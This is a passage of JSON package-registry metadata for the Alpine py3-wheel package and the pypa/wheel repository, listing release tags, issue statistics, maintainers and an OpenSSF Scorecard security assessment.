a/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:25.891Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.19","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages/py3-wheel/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":59,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2023-12-20T11:13:51.097Z","updated_at":"2023-12-20T11:13:51.097Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.19","url":"https://pkgs.alpinelinux.org/packages?branch=v3.19","ecosystem":"alpine","default":false,"packages_count":23031,"maintainers_count":392,"namespaces_count":2,"keywords_count":3179,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":824},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-12-20T09:51:56.346Z","updated_at":"2026-06-10T05:19:05.125Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.19/namespaces"}},{"id":6186398,"name":"py3-wheel","ecosystem":"alpine","description":"built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_published_at":"2021-04-05T18:18:10.000Z","latest_release_number":"0.36.2-r2","last_synced_at":"2026-03-05T06:37:15.282Z","created_at":"2023-02-01T00:57:55.104Z","updated_at":"2026-03-05T06:37:15.282Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.14/main/x86_64/py3-wheel","install_command":"apk add py3-wheel","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/publish.yml:48","Warn: no topLevel permission defined: .github/workflows/publish.yml:1","Warn: no topLevel permission defined: .github/workflows/test.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.txt:0","Info: FSF or OSI recognized license: MIT License: LICENSE.txt:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/publish.yml:31"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Security-Policy","score":0,"reason":"security policy file not detected","details":["Warn: no security policy file detected","Warn: no security file to analyze","Warn: no security file to analyze","Warn: no security file to analyze"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":5,"reason":"SAST tool is not run on all commits -- score normalized to 5","details":["Warn: 6 commits out of 12 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code 